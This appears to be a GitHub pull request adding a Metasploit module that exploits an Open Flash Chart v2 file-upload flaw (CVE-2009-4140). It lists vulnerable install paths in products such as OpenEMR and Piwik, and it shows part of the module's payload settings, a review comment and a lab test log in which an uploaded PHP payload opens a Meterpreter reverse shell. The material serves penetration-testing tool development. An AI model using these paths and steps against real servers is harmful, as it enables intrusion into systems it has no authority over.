Add Open Flash Chart v2 Arbitrary File Upload exploit #2572

Merged
merged 1 commit into from Oct 24, 2013

Projects

None yet

3 participants

@bcoles
Contributor
bcoles commented Oct 24, 2013

Add Open Flash Chart v2 Arbitrary File Upload exploit

Version: 2.x
Source: http://sourceforge.net/projects/openflashchart/
Tested on: Ubuntu

  • open-flash-chart v2-Lug-Wyrm-Charmer - set TARGETURI /php-ofc-library/
  • open-flash-chart v2-beta-1 - set TARGETURI /php-ofc-library/
  • zonPHP v2.25 - set TARGETURI /zonPHPv225/ofc/
  • Piwik v0.4.3 - set TARGETURI /piwik/libs/open-flash-chart/php-ofc-library/
  • OpenEMR v4.1.1 - set TARGETURI /openemr-4.1.1/library/openflashchart/php-ofc-library/
@bcoles

GreatRanking as the directory may not be writable; and the payload will not execute if the $default_path variable value has been modified to an absolute file path.

@jvazquez-r7
Contributor

Processing...

@Meatballs1 Meatballs1 commented on the diff Oct 24, 2013
.../exploits/unix/webapp/open_flash_chart_upload_exec.rb
+ ['CVE', '2009-4140'],
+ ['OSVDB', '59051'],
+ ['EDB', '10532']
+ ],
+ 'Payload' =>
+ {
+ 'Space' => 8190, # Just a big value, injection on HTTP POST
+ 'DisableNops' => true,
+ 'BadChars' => "\x00"
+ },
+ 'Arch' => ARCH_PHP,
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ # Tested on:
+ # * open-flash-chart v2-Lug-Wyrm-Charmer
@Meatballs1
Meatballs1 Oct 24, 2013 Contributor

Wouldn't this be better as a hash of URIs and with an OptEnum to choose the correct version? With TARGETURI supplying any base path if required?

e.g.

uri = datastore['TARGETURI'] + targets[datastore['VERSION']]

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 24, 2013
jvazquez-r7 Land #2572, @bcoles's exploit for cve-2009-4140 cb3b302
@jvazquez-r7 jvazquez-r7 merged commit 8a5d4d4 into rapid7:master Oct 24, 2013

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Thanks @bcoles,

Landed after las cleanup here: 2ef33aa

Cleanup includes:

  • Allow FileDropper to clean
  • Fix the use of the Content-Type header on send_request_cgi
  • Register file to clean once the update has been successful.

Test:

msf exploit(open_flash_chart_upload_exec) > show options

Module options (exploit/unix/webapp/open_flash_chart_upload_exec):

   Name       Current Setting                                        Required  Description
   ----       ---------------                                        --------  -----------
   Proxies                                                           no        Use a proxy chain
   RHOST      192.168.172.133                                        yes       The target address
   RPORT      80                                                     yes       The target port
   TARGETURI  /open-flash-chart-2-Lug-Wyrm-Charmer/php-ofc-library/  yes       The base path to Open Flash Chart
   VHOST                                                             no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Generic (PHP Payload)


msf exploit(open_flash_chart_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.133:80 - Uploading 'XwarY9wxRb.php' (1786 bytes)...
[*] 192.168.172.133:80 - Executing '../tmp-upload-images/XwarY9wxRb.php'
[*] Sending stage (39195 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:37492) at 2013-10-24 10:11:47 -0500
[+] Deleted XwarY9wxRb.php

meterpreter > exit
@bcoles bcoles deleted the bcoles:open_flash_chart_upload_exec branch Dec 19, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment